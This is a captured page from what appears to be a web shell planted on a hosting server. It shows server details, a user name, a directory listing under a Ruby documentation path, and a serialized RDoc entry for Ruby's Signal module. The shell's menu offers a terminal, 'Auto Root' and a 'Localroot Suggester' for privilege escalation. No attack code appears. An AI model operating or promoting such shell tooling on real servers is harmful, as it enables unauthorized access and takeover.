Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Signal /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Signal.ri
1.45
KB
-rw-r--r--
2023-07-26 17:26
list-c.ri
766
B
-rw-r--r--
2023-07-26 17:26
trap-c.ri
1.45
KB
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::NormalModule[iI"Signal:ET@0o:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[ I"?Many operating systems allow signals to be sent to running;TI"Hprocesses. Some signals have a defined effect on the process, while;TI"@others may be trapped at the code level and acted upon. For;TI"Hexample, your process may trap the USR1 signal and use it to toggle;TI"Cdebugging, and may use TERM to initiate a controlled shutdown.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim;[I"pid = fork do ;FI" Signal.trap("USR1") do ;FI" $debug = !$debug ;FI"# puts "Debug now: #$debug" ;FI" end ;FI" Signal.trap("TERM") do ;FI" puts "Terminating..." ;FI" shutdown() ;FI" end ;FI"" # . . . do some work . . . ;FI" end ;FI" ;FI"Process.detach(pid) ;FI" ;FI"# Controlling program: ;FI"Process.kill("USR1", pid) ;FI"# ... ;FI"Process.kill("USR1", pid) ;FI"# ... ;FI"Process.kill("TERM", pid) ;Fo; ;[I"produces:;To;;[I" Debug now: true ;FI" Debug now: false ;FI"Terminating... ;Fo; ;[I"CThe list of available signal names and their interpretation is;TI"Fsystem dependent. Signal delivery semantics may also vary between;TI"Gsystems; in particular signal delivery may not always be reliable.;T: @fileI" signal.c;T;0[ [ [ [[I" class;F[[:public[[I" list;T@7[I" trap;T@7[:protected[ [:private[ [I" instance;F[[; [ [;[ [;[